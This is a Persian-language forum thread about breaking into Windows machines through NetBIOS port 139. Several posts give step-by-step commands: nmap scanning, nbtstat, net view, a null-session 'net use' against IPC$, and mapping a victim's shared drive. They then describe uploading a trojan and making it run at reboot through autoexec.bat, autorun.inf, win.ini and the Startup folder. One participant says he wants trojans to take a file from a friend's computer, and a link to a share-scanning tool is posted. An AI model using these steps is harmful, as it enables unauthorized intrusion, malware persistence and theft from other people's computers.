برگزیده های پرشین تولز

هك با استفاده از پورت 139

black_jack_of_black_city

Registered User
لایک‌ها
73
با قلبی شکسته در انتظار مرگ گوشه ای نشستم . به آرز
با استفاده از لژيون ميتونين يه رنج خاص از آي پي رو اسكن كنين و ببينين كه چه چيزايي رو شير كردن بعد ميتونين توي اون يه تروجان آپلود كنين و دستورشو توي وين آي ان آى بزنين تا توي ريسارت بعدي تروجان اجرا بشه

فقط نبايد پشت فابر وال باشين

اينم لينكش

http://www.netbaz.com/legion.zip

Mafia Reloaded

کاربر تازه وارد
لایک‌ها
0
آخه زنه آلارم دارم با نورتن آنتي ويروس 2004 !

sina1808

Registered User
لایک‌ها
7
معمولا درايو ويندوز شر نيست تا بشه كاري كرد كه در ري استارت بعدي تروجان اجرا بشه
شما ممكنه تو كلاس اي پي سرويس دهنده تون فقط 1 يا 2 نفر پيدا كنيي كه 139 اونها باز و درايو c هم شر شده باشه . . .

شايان

مدیران قدیمی
لایک‌ها
9
- NetBIOS چيست؟

NetBIOS مخفف عبارت Network Basic Input/Output System است. NetBIOS ابزاري است که اجازه به اشتراک گذاشتن منابع رو به ما مي‌ده. ما برای به اشتراک گذاشتن فايل‌ها و يا پرينتر مي‌تونيم از اين پروتکل استفاده کنيم. نکته مهم اين است که NetBIOS فقط در سيستم‌عامل ويندوز معني داره (اگرچه ابزارهايي مثل Samba در لينوکس مي‌تونن اونو شبيه سازي کنن ولي بحث ما خود پروتکل NetBIOS است). وقتي NetBIOS در ويندوز فعال باشد، بلافاصله سه تا پورت براي استفاده باز مي‌شوند. پورت مهم و اصلي پورت ۱۳۹ در tcp است که NetBIOS را هم با اين پورت مي‌شناسن. دو پورت ديگر، از نوع udp هستند و عبارتند از پورت ۱۳۷ براي name service و پورت ۱۳۹ براي Datagram service . وقتي قرار باشه که يک سيستم‌عامل ويندوز هک بشه ( خصوصا اگه کلاينت باشه ) يکي از اولين مواردي که به ذهن مي‌رسه، استفاده از NetBIOS ه.
حالا ببينيم منظور از به اشتراک گذاشتن (Sharing) در مورد فايل‌ها و پرينتر‌ها چيست؟
به اشتراک گذاشتن در مورد فايل‌ها يعني قرار دادن تعدادي فايل در يک کامپيوتر خاص به طوريکه توسط ساير کامپيوترها قابل دسترسي و استفاده باشه. در مورد پرينتر به اشتراک گذاشتن يعني طوري چاپگر متصل به يک کامپيوتر را تنظيم کنيم که توسط ساير کامپيوتر‌ها هم قابل استفاده باشه. با توجه به اينکه در سيستم‌عامل‌هاي ويندوز به صورت پيش‌فرض NetBIOS فعال است، پس مي‌توان به تعدادي از فايل‌ها و فولدرهاي تعدادي از کامپيوترهاي روي شبکه دسترسي داشت و فايل‌ها را خواند و حتي کپي يا پاک کرد.

- چگونه با پورت ۱۳۹ صحبت کنيم؟

۱- اولين کاري که مي‌کنيم اين است که براي پورت ۱۳۹ پورت اسکن مي‌کنيم تا ip هايي را که پورت ۱۳۹ در آنها باز است، پيدا کنيم. من اين کار را با nmap انجام مي‌دم. فرض کنيد که يک ip به شماره 217.218.84.29 را تست کرده و به نتيجه زير برسم:

کد:
Interesting ports on HOME-TU6U0AV86Y (217.218.84.29):
Port       State       Service
139/tcp    open        netbios-ssn             
Remote operating system guess: Windows Me, Win 2000, or WinXP

اين خروجي اعلام مي‌کند که پورت ۱۳۹ باز است. پس مي‌شود از اين ip استفاده کرد.

۲- حالا مي‌خوام با اين پورت ارتباط برقرار کنم. اصولا بايد مثل سابق از telnet يا nc استفاده کنم ولي در مورد پورت ۱۳۹ روش ارتباطي فرق مي‌کند. کامنت پرامت را باز کرده و دستور زير را مي‌نويسم:

کد:
nbtstat -A 217.218.84.29

دستور nbtstat يک ابزار خاص براي کار با NetBIOS است. دقت کنيد که از پارامتر A- با ip مربوطه استفاده کردم. (دستور nbtstat داراي پارامتر‌هاي بسياري است که اگه مي‌خواين همه رو ببينين، بنويسين nbtstat و enter را بزنيد.)
حالا بحث اينه که اين دستور چه‌ کاري مي‌کنه و خروجي به چه صورتي است:
اين دستور به ip مورد نظر وصل مي‌شه و از اون مي‌خواد ليست منابعي رو که به اشتراک گذاشته رو ليست کنه. در اين حالت ۲ حالت ممکنه اتفاق بيوفته:
الف) مواجه با پيغام Host not found بشم. اين يعني اينکه نمي‌تونه ليست منابع را از اون کامپيوتر بگيره (يعني NetBIOS غير فعاله). يعني اگرچه پورت ۱۳۹ بازه ولي قابل استفاده نيست.
ب) ارتباط برقرار بشه و ليست منابع اشتراکي ليست بشه:

کد:
           NetBIOS Remote Machine Name Table

Name               Type         Status
    ---------------------------------------------
    HOME-TU6U0AV86Y<00>  UNIQUE      Registered
    MSHOME         <00>  GROUP       Registered
    HOME-TU6U0AV86Y<20>  UNIQUE      Registered
    MSHOME         <1E>  GROUP       Registered

MAC Address = 00-53-45-00-00-00

۳- در اين نتايج چيزي که به درد مي‌خوره، سطري است که <20> دارد. اگه <20> نباشد، يعني نمي‌تونين از اشتراک گذاري فايل استفاده کنيد ( به عبارت ساده تر بي‌خيال شو اين کامپيوتر رو ! ). در اين مثال ما اين سطر را داشتيم پس ادامه مي‌دهيم. حالا مي‌نويسم:

کد:
net view \\217.218.84.29

حالا اگه گفتين چي ميشه؟ درسته! دو حالت ممکنه اتفاق بيوفته:
الف) پيغام بياد

کد:
System error 5 has occurred.

Access is denied.

اين يعني نمي‌تونين ادامه بدين. به عبارت ديگه ايست! ولي يه کاري مي‌تونيد بکنيد و اون اينه که يه null session برقرار کنيد با اون کامپيوتر. اين حالت در مورد ويندوز‌هاي سري NT جواب ميده. مي‌نويسيد:

کد:
net use \\217.218.84.29\IPC$ "" /user:""

حالا چرا مي‌گن null session ؟ دليلش اينه که يک ارتباط برقرار کردم با اون ip بدون username و بدون password . حالا اگه اين دستور جواب داد مي‌تونم دوباره دستور net view \\217.218.84.29 را تکرار کنم.
ب) ممکنه دستور ذکر شده جواب بده و مثلا جواب بده:

کد:
Shared resources at \\217.218.84.29

Share name   Type         Used as  Comment

------------------------------------------------
Printer      Print                 Acrobat PDFWriter
Printer2     Print                 Acrobat Distiller
SharedDocs   Disk
The command completed successfully.

عاليه. دقت کنيد که در اين کامپيوتر يک فايل (Disk) به اسم ShareDocs به اشتراک گذاشته شده (دو تاي باقي براي پرينتر است). حالا که رسيدم به اين اسم ديگه آخرين دستور را مي‌نويسم.

۴- حالا وقتشه که واقعا عمل به اشتراک گذاشتن رو انجام بديم. براي اينکار بايد يک درايو انتخاب کنيد. حتما مي‌دونيد که درايو چيه. وقتي شما My Computer را دابل کليک کرده و باز مي‌کنيد، يک سري آيکون مي‌بينيد که هر کدام اسمي‌ دارند. مثلا :A براي فلاپي و و و تا مي‌رسيد به cdrom که آخرين حرف را دارد. مثلا فرض کنيد که :K باشه. حالا بايد اسم درايو رو براي اشتراک گذاشتن انتخاب کنيد. براي اين‌کار حرف بعدي در زبان انگليسي رو به کار ببريد. چون در کامپيوتر من :K آخرين بود، من حرف بعدي يعني :L را انتخاب مي‌کنم و دستور زير را مي‌نويسم:

کد:
net use L: \\217.218.84.29\SharedDocs

به اسم درايو، ip و نام مربوطه که ShareDocs دقت کنيد. چون من اصطلاحا به صورت null session دارم ارتباط مي‌گيرم، ممکنه کار نکنه ولي اگه درست کار کنه جواب مي‌شنوم:

کد:
The command completed successfully.

معرکه است!!! حالا My Computer رو باز کنيد و ببينيد که درايو جديد به ليست درايوها اضافه شده که مي‌تونين مثل درايوهاي معمولي با اون کار کنيد و فايل کپي کنيد و ...

۵- وقتي کار تموم شد مي‌تونيد درايو رو حذف کنيد. براي اينکار مي‌تونين روي درايو رايت‌کليک کنيد و Disconnect را انتخاب کنيد. و يا اينکه از دستور

کد:
net use /delete L:

استفاده کنيد.

شايان

مدیران قدیمی
لایک‌ها
9
- چگونه از اين امکانات به اشتراک گذاشتن، براي اجراي يک تروجان روي کامپيوتر قرباني استفاده کنيم؟

خوب ما هنوز طريقه استفاده از تروجان رو ياد نگرفتيم ولي سعي مي‌کنم تو يکي از درس‌هاي آينده اونو توضيح بدم. ما اينجا مي‌خواهيم از تروجان در رابطه با پورت ۱۳۹ استفاده کنيم. حالا سوال اين است که تروجان (trojan) چيست؟
تروجان به‌طور ساده برنامه‌اي اجرايي است، که ما براي طرف مقابل مي‌فرستيم و اگه طرف مقابل اونو اجرا کنه، ما مي‌تونيم کنترل سيستم‌ اونو به دست بياريم. تا اينجا کافي است فعلا ولي بعدا بيشتر توضيح مي‌دم.
حالا همان بحث تروجان ولي در رابطه با پورت ۱۳۹ :
روش کار به اين صورت است که فرضا من الان تونستم يک درايو رو از يک کامپيوتر با پورت باز Share کنم. حالا فايل تروجان ( سرور تروجان ) را upload مي‌کنم به اون کامپيوتر و اسمي براش انتخاب مي‌کنم که طرف مقابل رو به اجراي فايل تشويق کنه. يک اشتباهي که بعضي‌ها مي‌کنند اينه که بعد از کپي کردن تروجان در کامپيوتر هدف، خود هکر مي‌آد و فايل رو دابل کليک مي‌کنه، در اين حالت تروجان روي کامپيوتر خودمون (هکر) اجرا مي‌شه نه کامپيوتر قرباني. پس ما فقط فايل رو مي‌فرستيم و منتظر مي‌مونيم که طرف مقابل اجرا کنه.

حالا چند روش رو مطرح مي‌کنم که در شرايط خاص حالتي رو ايجاد مي‌کنه که نيازي با دابل‌کليک توسط قرباني نباشد:
۱- اگه به درايو C کامپيوتر مقابل دسترسي داريد، يک سطر به فايل autoexec.bat اضافه کنيد که نام و مسير فايل اجرايي را در اون سطر بنويسيد. مثلا اگه اسم تروجان ali.exe باشد و در مسير d:\newfolder باشد، سطري که اضافه مي‌کنيم به صورت زير است:

کد:
d:\newfolder\ali.exe

در اين حالت به محض اولين restart کامپيوتر، تروجان اجرا خواهد شد.
۲- اگه به درايو C دسترسي داريد، مي‌تونيد فايلي به اسم Autorun.inf ايجاد کنيد و دستورات زير را بنويسيد ( سطر آخر مطابق با همان تروجان فرضي که در مثال قبل گفتيم، نوشته شده است، اونو با توجه به اسم تروجان و مسير اون تغيير دهيد) :

کد:
[autorun]
open=d:\newfolder\ali.exe

۳- اگه به فولدر ويندوز دسترسي داريد، مي‌تونيد يک سطر مثل همان مثال قبل ولي براي فايل winstart.bat اجرا کنيد. در اين حالت هم به محض restart اجرا خواهد شد.
۴- اگه به فولدر ويندوز دسترسي داريد، در فايل win.ini و بعد از قسمتي که [windows] نوشته، اين سطر رو اضافه کنيد:

کد:
run=d:\newfolder\ali.exe

۵- اگه به فولدر ويندوز دسترسي داريد، مي‌تونيد تروجان رو به فولدر Start Menu\Startup اضافه کنيد. در اين حالت نيازي به ويرايش هيچ فايل ديگري نيست.

خوبی نکن

کاربر تازه وارد
لایک‌ها
2
به نقل از faridbahal :
یکی هم به ما بگه چرا بعد از اجرای سرور هیچ میل یا پی ام برای من نمیاد؟

:blink: :blink: :blink: :blink: :blink: :( :( :( :(

اگرديگه از www.IRDown.com برنامه گرفتم ۰۰۷
خوب خودتان را لو ميديد

faridbahal

Registered User
لایک‌ها
15
اگرديگه از www.IRDown.com برنامه گرفتم ۰۰۷
خوب خودتان را لو ميديد
:lol: :lol: :lol: :lol: :lol: :lol: :lol: :lol: :lol: :lol: :lol: :lol:
بابا اگه قرار بود اینجوری باشه به همه توصیه نمیکردم که دکتر وب استفاده کنن!
من این تروجانها رو فقط برای یه کاری میخوام قبلا هم کار نکردم بعدا هم نمیکنم ! فقط یه فایلی رو از کامپیوتر یکی از دوستام میخوام بدست بیارم که بدبختی نمیشه!

Samuell

کاربر تازه وارد
لایک‌ها
0
آقا باحاله

ميشه بگين از چه تروجاني استفاده ميكنين؟ :wacko:

Samuell

کاربر تازه وارد
لایک‌ها
0
زنده باد .... آقا جان

ایرونی ایرونی کار کن